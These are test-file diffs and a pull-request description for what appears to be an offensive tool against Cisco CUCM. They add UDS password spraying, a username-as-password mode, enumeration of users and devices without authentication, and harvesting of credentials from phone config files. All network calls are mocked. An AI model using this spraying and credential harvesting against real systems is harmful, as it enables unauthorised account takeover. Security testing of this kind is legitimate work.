     _patch_oracle(monkeypatch, 'ok')

--- a/tests/test_spray.py
+++ b/tests/test_spray.py
@@ -65,6 +65,16 @@ def test_init_database_creates_spray_attempts_index(db_path):
     assert _index_exists(db_path, "idx_spray_attempts_user_time")
 
 
+def test_init_database_sets_restrictive_file_mode(tmp_path):
+    """Plaintext secrets live in this DB; the file must not be world-readable."""
+    import stat
+    p = tmp_path / "thief.db"
+    thief.init_database(str(p))
+    mode = stat.S_IMODE(p.stat().st_mode)
+    # Owner read+write only; nothing for group or other.
+    assert mode == 0o600, f'expected 0600, got {oct(mode)}'
+
+
 def test_record_uds_users_inserts_new_rows(db_path):
     thief.record_uds_users("cucm-a.example.com", ["alice", "bob"], db_path)
     conn = sqlite3.connect(db_path)

--- a/tests/test_spray.py
+++ b/tests/test_spray.py
@@ -61,3 +61,46 @@ def test_init_database_creates_spray_attempts_table(db_path):
 
 def test_init_database_creates_spray_attempts_index(db_path):
     assert _index_exists(db_path, "idx_spray_attempts_user_time")
+
+
+def test_record_uds_users_inserts_new_rows(db_path):
+    thief.record_uds_users("cucm-a.example.com", ["alice", "bob"], db_path)
+    conn = sqlite3.connect(db_path)
+    rows = conn.execute(
+        "SELECT cucm_host, username FROM uds_users ORDER BY username"
+    ).fetchall()
+    conn.close()
+    assert rows == [
+        ("cucm-a.example.com", "alice"),
+        ("cucm-a.example.com", "bob"),
+    ]
+
+
+def test_record_uds_users_updates_last_seen_on_conflict(db_path):
+    thief.record_uds_users("cucm-a.example.com", ["alice"], db_path)
+    conn = sqlite3.connect(db_path)
+    first_seen, last_seen_1 = conn.execute(
+        "SELECT first_seen, last_seen FROM uds_users WHERE username='alice'"
+    ).fetchone()
+    conn.close()
+
+    time.sleep(1)  # ensure timestamp differs at second granularity
+    thief.record_uds_users("cucm-a.example.com", ["alice"], db_path)
+    conn = sqlite3.connect(db_path)
+    first_seen_2, last_seen_2 = conn.execute(
+        "SELECT first_seen, last_seen FROM uds_users WHERE username='alice'"
+    ).fetchone()
+    conn.close()
+    assert first_seen == first_seen_2  # first_seen is immutable
+    assert last_seen_2 > last_seen_1  # last_seen advanced
+
+
+def test_record_uds_users_host_scoped(db_path):
+    thief.record_uds_users("cucm-a.example.com", ["alice"], db_path)
+    thief.record_uds_users("cucm-b.example.com", ["alice"], db_path)
+    conn = sqlite3.connect(db_path)
+    count = conn.execute(
+        "SELECT COUNT(*) FROM uds_users WHERE username='alice'"
+    ).fetchone()[0]
+    conn.close()
+    assert count == 2  # one row per host

--- a/tests/test_spray.py
+++ b/tests/test_spray.py
@@ -637,3 +637,79 @@ def test_show_db_omits_spray_section_when_no_hits(db_path, capsys):
     thief.display_database_summary(db_path)
     out = capsys.readouterr().out
     assert "UDS Spray Hits" not in out
+
+
+# ---------------------------------------------------------------------------
+# --spray-user-as-pass
+# ---------------------------------------------------------------------------
+
+def test_spray_worker_uses_username_as_password_when_user_as_pass(db_path):
+    """When user_as_pass=True the worker must authenticate with password=username."""
+    work = queue_mod.Queue()
+    work.put("alice")
+    results = {"hits": 0, "misses": 0, "errors": 0, "other": 0, "lock": threading.Lock()}
+    captured = {}
+
+    def fake_get(url, **kwargs):
+        captured['auth'] = kwargs.get('auth')
+        return MagicMock(status_code=401, text="")
+
+    with patch.object(thief.requests, 'get', side_effect=fake_get):
+        thief._spray_worker(
+            work_queue=work, results=results, password=None,
+            cucm_host="cucm-a.example.com", port=8443, db_file=db_path,
+            dead_flag=threading.Event(), user_as_pass=True,
+        )
+
+    assert captured['auth'] == ('alice', 'alice')
+
+
+def test_run_spray_user_as_pass_uses_username_as_password(monkeypatch, db_path):
+    """run_spray(user_as_pass=True) should attempt username:username for each user."""
+    _patch_get_users(monkeypatch, ["alice", "bob"])
+    _patch_oracle(monkeypatch, 'ok')
+
+    attempted = {}
+
+    def fake_get(url, **kwargs):
+        user = url.rsplit('/', 1)[-1]
+        attempted[user] = kwargs.get('auth')
+        return MagicMock(status_code=401, text="")
+
+    with patch.object(thief.requests, 'get', side_effect=fake_get):
+        thief.run_spray(
+            cucm_host="cucm-a.example.com", port=8443,
+            passwords=[], threads=2,
+            rate_limit_hours=1, probe=True, db_file=db_path,
+            user_as_pass=True,
+        )
+
+    assert attempted.get('alice') == ('alice', 'alice')
+    assert attempted.get('bob') == ('bob', 'bob')
+
+
+def test_cli_spray_user_as_pass_invokes_run_spray_correctly(monkeypatch, tmp_path):
+    called = {}
+    monkeypatch.setattr(thief, 'run_spray', lambda **kw: called.update(kw))
+    monkeypatch.setattr(thief, 'get_version', lambda *a, **kw: None)
+    db = tmp_path / "thief.db"
+    monkeypatch.setattr('sys.argv', [
+        'thief', '-H', '1.2.3.4', '--spray', '--spray-user-as-pass',
+        '--db', str(db),
+    ])
+    with pytest.raises(SystemExit):
+        thief.main()
+    assert called.get('user_as_pass') is True
+
+
+def test_cli_spray_user_as_pass_mutually_exclusive_with_password(monkeypatch, tmp_path, capsys):
+    db = tmp_path / "thief.db"
+    monkeypatch.setattr('sys.argv', [
+        'thief', '-H', '1.2.3.4', '--spray',
+        '--spray-user-as-pass', '--spray-password', 'bad',
+        '--db', str(db),
+    ])
+    with pytest.raises(SystemExit):
+        thief.main()
+    out = capsys.readouterr().out
+    assert 'exactly one' in out or 'mutually exclusive' in out.lower() or 'exclusive' in out

--- a/tests/test_uds_devices.py
+++ b/tests/test_uds_devices.py
@@ -1,0 +1,203 @@
+"""Tests for unauthenticated UDS device enumeration."""
+import sqlite3
+from unittest.mock import MagicMock, patch
+
+import pytest
+import requests
+
+from seeyoucm_thief import thief
+
+
+@pytest.fixture(autouse=True)
+def _disable_test_mode(monkeypatch):
+    monkeypatch.setattr(thief, '_TEST_MODE', False)
+
+
+@pytest.fixture
+def db_path(tmp_path):
+    p = tmp_path / "thief.db"
+    thief.init_database(str(p))
+    return str(p)
+
+
+def _rows(db_path, sql, params=()):
+    conn = sqlite3.connect(db_path)
+    rows = conn.execute(sql, params).fetchall()
+    conn.close()
+    return rows
+
+
+# ---------------------------------------------------------------------------
+# parse_uds_devices
+# ---------------------------------------------------------------------------
+
+UDS_USER_XML = """<?xml version="1.0" encoding="UTF-8"?>
+<user>
+  <userName>alice</userName>
+  <associatedDevices>
+    <device>SEP001122334455</device>
+    <device>SEP667788990011</device>
+  </associatedDevices>
+</user>"""
+
+UDS_USER_XML_NO_DEVICES = """<?xml version="1.0" encoding="UTF-8"?>
+<user>
+  <userName>bob</userName>
+</user>"""
+
+
+def test_parse_uds_devices_returns_sep_names():
+    devices = thief.parse_uds_devices(UDS_USER_XML)
+    assert devices == ["SEP001122334455", "SEP667788990011"]
+
+
+def test_parse_uds_devices_returns_empty_when_no_devices():
+    assert thief.parse_uds_devices(UDS_USER_XML_NO_DEVICES) == []
+
+
+def test_parse_uds_devices_returns_empty_on_blank_body():
+    assert thief.parse_uds_devices("") == []
+
+
+def test_parse_uds_devices_ignores_non_sep_device_names():
+    xml = "<user><associatedDevices><device>CIPC001122334455</device><device>SEP001122334455</device></associatedDevices></user>"
+    assert thief.parse_uds_devices(xml) == ["SEP001122334455"]
+
+
+# ---------------------------------------------------------------------------
+# uds_devices DB table
+# ---------------------------------------------------------------------------
+
+def test_init_database_creates_uds_devices_table(db_path):
+    conn = sqlite3.connect(db_path)
+    cols = {row[1] for row in conn.execute("PRAGMA table_info(uds_devices)").fetchall()}
+    conn.close()
+    assert {"id", "cucm_host", "username", "device_name", "source", "discovery_time"} <= cols
+
+
+def test_log_uds_device_inserts_row(db_path):
+    thief.log_uds_device("cucm.example.com", "alice", "SEP001122334455", "userenum", db_path)
+    rows = _rows(db_path, "SELECT cucm_host, username, device_name, source FROM uds_devices")
+    assert rows == [("cucm.example.com", "alice", "SEP001122334455", "userenum")]
+
+
+def test_log_uds_device_ignores_duplicate(db_path):
+    thief.log_uds_device("cucm.example.com", "alice", "SEP001122334455", "userenum", db_path)
+    thief.log_uds_device("cucm.example.com", "alice", "SEP001122334455", "userenum", db_path)
+    rows = _rows(db_path, "SELECT COUNT(*) FROM uds_devices")
+    assert rows[0][0] == 1
+
+
+# ---------------------------------------------------------------------------
+# get_user_devices_unauthenticated
+# ---------------------------------------------------------------------------
+
+def test_get_user_devices_unauthenticated_returns_devices_on_200():
+    fake_resp = MagicMock(status_code=200, text=UDS_USER_XML)
+    with patch.object(thief.requests, 'get', return_value=fake_resp) as mock_get:
+        devices = thief.get_user_devices_unauthenticated("cucm.example.com", 8443, "alice")
+    assert devices == ["SEP001122334455", "SEP667788990011"]
+    call_kwargs = mock_get.call_args
+    assert 'auth' not in (call_kwargs.kwargs or {})
+
+
+def test_get_user_devices_unauthenticated_returns_empty_on_401():
+    fake_resp = MagicMock(status_code=401, text="")
+    with patch.object(thief.requests, 'get', return_value=fake_resp):
+        devices = thief.get_user_devices_unauthenticated("cucm.example.com", 8443, "alice")
+    assert devices == []
+
+
+def test_get_user_devices_unauthenticated_returns_empty_on_network_error():
+    with patch.object(thief.requests, 'get', side_effect=requests.exceptions.ConnectTimeout("boom")):
+        devices = thief.get_user_devices_unauthenticated("cucm.example.com", 8443, "alice")
+    assert devices == []
+
+
+# ---------------------------------------------------------------------------
+# enumerate_devices_unauthenticated
+# ---------------------------------------------------------------------------
+
+def test_enumerate_devices_unauthenticated_logs_found_devices(db_path):
+    def fake_probe(cucm_host, port, username):
+        if username == "alice":
+            return ["SEP001122334455"]
+        return []
+
+    thief.enumerate_devices_unauthenticated(
+        "cucm.example.com", 8443, ["alice", "bob"], db_path, threads=2,
+        _probe_fn=fake_probe,
+    )
+    rows = _rows(db_path, "SELECT username, device_name, source FROM uds_devices")
+    assert ("alice", "SEP001122334455", "userenum") in rows
+    assert not any(r[0] == "bob" for r in rows)
+
+
+def test_enumerate_devices_unauthenticated_returns_count_found(db_path):
+    def fake_probe(cucm_host, port, username):
+        return ["SEP001122334455"] if username == "alice" else []
+
+    count = thief.enumerate_devices_unauthenticated(
+        "cucm.example.com", 8443, ["alice", "bob"], db_path, threads=2,
+        _probe_fn=fake_probe,
+    )
+    assert count == 1
+
+
+# ---------------------------------------------------------------------------
+# _spray_worker device parsing on 200
+# ---------------------------------------------------------------------------
+
+def test_spray_worker_logs_devices_from_200_response(db_path):
+    import queue as queue_mod
+    import threading
+
+    work = queue_mod.Queue()
+    work.put("alice")
+    results = {"hits": 0, "misses": 0, "errors": 0, "other": 0, "lock": threading.Lock()}
+    fake_resp = MagicMock(status_code=200, text=UDS_USER_XML)
+    with patch.object(thief.requests, 'get', return_value=fake_resp):
+        thief._spray_worker(
+            work_queue=work, results=results, password="Summer2025!",
+            cucm_host="cucm.example.com", port=8443, db_file=db_path,
+            dead_flag=threading.Event(),
+        )
+    rows = _rows(db_path, "SELECT username, device_name, source FROM uds_devices")
+    assert ("alice", "SEP001122334455", "spray_hit") in rows
+    assert ("alice", "SEP667788990011", "spray_hit") in rows
+
+
+def test_spray_worker_does_not_log_devices_on_401(db_path):
+    import queue as queue_mod
+    import threading
+
+    work = queue_mod.Queue()
+    work.put("bob")
+    results = {"hits": 0, "misses": 0, "errors": 0, "other": 0, "lock": threading.Lock()}
+    fake_resp = MagicMock(status_code=401, text="")
+    with patch.object(thief.requests, 'get', return_value=fake_resp):
+        thief._spray_worker(
+            work_queue=work, results=results, password="bad",
+            cucm_host="cucm.example.com", port=8443, db_file=db_path,
+            dead_flag=threading.Event(),
+        )
+    rows = _rows(db_path, "SELECT COUNT(*) FROM uds_devices")
+    assert rows[0][0] == 0
+
+
+# ---------------------------------------------------------------------------
+# --show-db uds_devices section
+# ---------------------------------------------------------------------------
+
+def test_show_db_displays_uds_devices(db_path, capsys):
+    thief.log_uds_device("cucm.example.com", "alice", "SEP001122334455", "userenum", db_path)
+    thief.display_database_summary(db_path)
+    out = capsys.readouterr().out
+    assert "SEP001122334455" in out
+    assert "alice" in out
+
+
+def test_show_db_omits_uds_devices_section_when_empty(db_path, capsys):
+    thief.display_database_summary(db_path)
+    out = capsys.readouterr().out
+    assert "UDS Devices" not in out

--- a/tests/test_uds_devices.py
+++ b/tests/test_uds_devices.py
@@ -201,3 +201,60 @@ def test_show_db_omits_uds_devices_section_when_empty(db_path, capsys):
     thief.display_database_summary(db_path)
     out = capsys.readouterr().out
     assert "UDS Devices" not in out
+
+
+# ---------------------------------------------------------------------------
+# download_uds_discovered_configs
+# ---------------------------------------------------------------------------
+
+def test_download_uds_discovered_configs_calls_search_for_each_device(db_path, monkeypatch):
+    searched = []
+    monkeypatch.setattr(thief, 'search_for_secrets',
+                        lambda host, filename, use_tftp=True: (searched.append(filename), ([], []))[1])
+
+    thief.download_uds_discovered_configs(
+        "cucm.example.com", ["SEP001122334455", "SEP667788990011"], db_path,
+    )
+
+    assert "SEP001122334455.cnf.xml" in searched
+    assert "SEP667788990011.cnf.xml" in searched
+
+
+def test_download_uds_discovered_configs_logs_credentials_to_db(db_path, monkeypatch):
+    monkeypatch.setattr(thief, 'search_for_secrets',
+                        lambda host, filename, use_tftp=True: ([('admin', 'cisco', filename)], []))
+
+    thief.download_uds_discovered_configs(
+        "cucm.example.com", ["SEP001122334455"], db_path,
+    )
+
+    import sqlite3
+    conn = sqlite3.connect(db_path)
+    rows = conn.execute("SELECT username, password FROM credentials").fetchall()
+    conn.close()
+    assert ("admin", "cisco") in rows
+
+
+def test_download_uds_discovered_configs_returns_hit_count(db_path, monkeypatch):
+    def fake_search(host, filename, use_tftp=True):
+        if "001122334455" in filename:
+            return ([('admin', 'cisco', filename)], [])
+        return ([], [])
+
+    monkeypatch.setattr(thief, 'search_for_secrets', fake_search)
+
+    count = thief.download_uds_discovered_configs(
+        "cucm.example.com", ["SEP001122334455", "SEP667788990011"], db_path,
+    )
+
+    assert count == 1
+
+
+def test_download_uds_discovered_configs_handles_empty_list(db_path, monkeypatch):
+    called = []
+    monkeypatch.setattr(thief, 'search_for_secrets', lambda *a, **kw: called.append(1) or ([], []))
+
+    count = thief.download_uds_discovered_configs("cucm.example.com", [], db_path)
+
+    assert count == 0
+    assert called == []


### PR DESCRIPTION
## Summary

Adds an unauthenticated UDS-based password-spray capability and supporting device enumeration to the CLI.

- `--spray` UDS password-spray with per-user rate-limit awareness
- Pre-flight **oracle probe** that sends one bogus credential to verify the target actually validates auth before any real password is sent; aborts if the server returns 200 to a known-bad password. Disable with `--no-spray-probe` (probe on by default)
- `--spray-user-as-pass` to spray each user with their own username
- Unauthenticated UDS device enumeration + spray-hit device parsing, with auto-download/parse of configs for discovered devices
- New SQLite tables `uds_users` and `spray_attempts`; hits surface in `--show-db`
- Hardening: `chmod 0600` on `thief.db`, URL-escape username in UDS endpoint, `OSError` handling for unreadable `--passwords` file, tightened spray-password validation

Versioning is handled automatically on merge (feat/* → minor bump).

## Test plan

- `uv run pytest -q` (full mocked suite)